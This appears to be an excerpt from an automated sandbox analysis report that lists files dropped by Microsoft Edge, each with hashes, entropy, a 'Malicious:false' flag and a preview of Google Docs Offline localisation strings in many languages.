                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                                                      Entropy (8bit):4.879137540019932
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                      MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                      SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                      SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                      SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):907
                                                                                                                                                                                                      Entropy (8bit):4.599411354657937
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                      MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                      SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                      SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                      SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                      Entropy (8bit):4.604761241355716
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                      MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                      SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                      SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                      SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):937
                                                                                                                                                                                                      Entropy (8bit):4.686555713975264
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                      MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                      SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                      SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                      SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1337
                                                                                                                                                                                                      Entropy (8bit):4.69531415794894
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                      MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                      SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                      SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                      SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2846
                                                                                                                                                                                                      Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                      MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                      SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                      SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                      SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):934
                                                                                                                                                                                                      Entropy (8bit):4.882122893545996
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                      MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                      SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                      SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                      SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):963
                                                                                                                                                                                                      Entropy (8bit):4.6041913416245
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                      MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                      SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                      SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                      SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1320
                                                                                                                                                                                                      Entropy (8bit):4.569671329405572
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                      MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                      SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                      SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                      SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):884
                                                                                                                                                                                                      Entropy (8bit):4.627108704340797
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                      MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                      SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                      SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                      SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):980
                                                                                                                                                                                                      Entropy (8bit):4.50673686618174
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                      MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                      SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                      SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                      SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1941
                                                                                                                                                                                                      Entropy (8bit):4.132139619026436
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                      MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                      SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                      SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                      SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1969
                                                                                                                                                                                                      Entropy (8bit):4.327258153043599
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                      MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                      SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                      SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                      SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1674
                                                                                                                                                                                                      Entropy (8bit):4.343724179386811
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                      MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                      SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                      SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                      SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1063
                                                                                                                                                                                                      Entropy (8bit):4.853399816115876
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                      MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                      SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                      SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                      SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1333
                                                                                                                                                                                                      Entropy (8bit):4.686760246306605
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                      MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                      SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
